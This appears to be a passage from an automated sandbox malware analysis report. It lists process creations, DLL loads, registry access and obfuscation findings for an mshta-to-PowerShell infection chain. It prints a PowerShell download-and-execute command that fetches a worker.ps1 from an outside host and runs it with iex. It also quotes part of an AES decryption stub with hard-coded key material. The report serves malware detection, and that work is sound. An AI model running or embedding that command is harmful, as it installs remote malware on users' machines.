        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iexJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: scorlib.pdbpdblib.pdbi~$m5 source: powershell.exe, 00000000.00000002.4194333216.00000279DB238000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($inputStr) $iv = "&9*zS7LY%ZN1thfI" $key = "123456789012345678901234r0hollah".PadRight(16, [char]0) $aes = [System.Security.Cryptography.Aes]::Create() $utf8 = [System.Tex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8543AB push ecx; iretd 0_2_00007FFD9B8543AC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8500BD pushad ; iretd 0_2_00007FFD9B8500C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B861610 pushfd ; retf 0_2_00007FFD9B861611
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8585A7 push esp; retf 0_2_00007FFD9B8585A8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B85ACF2 push eax; ret 0_2_00007FFD9B85AD29
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BCD2B7E push eax; ret 0_2_00007FFD9BCD2B7F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BCD3869 pushad ; ret 0_2_00007FFD9BCD386A

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
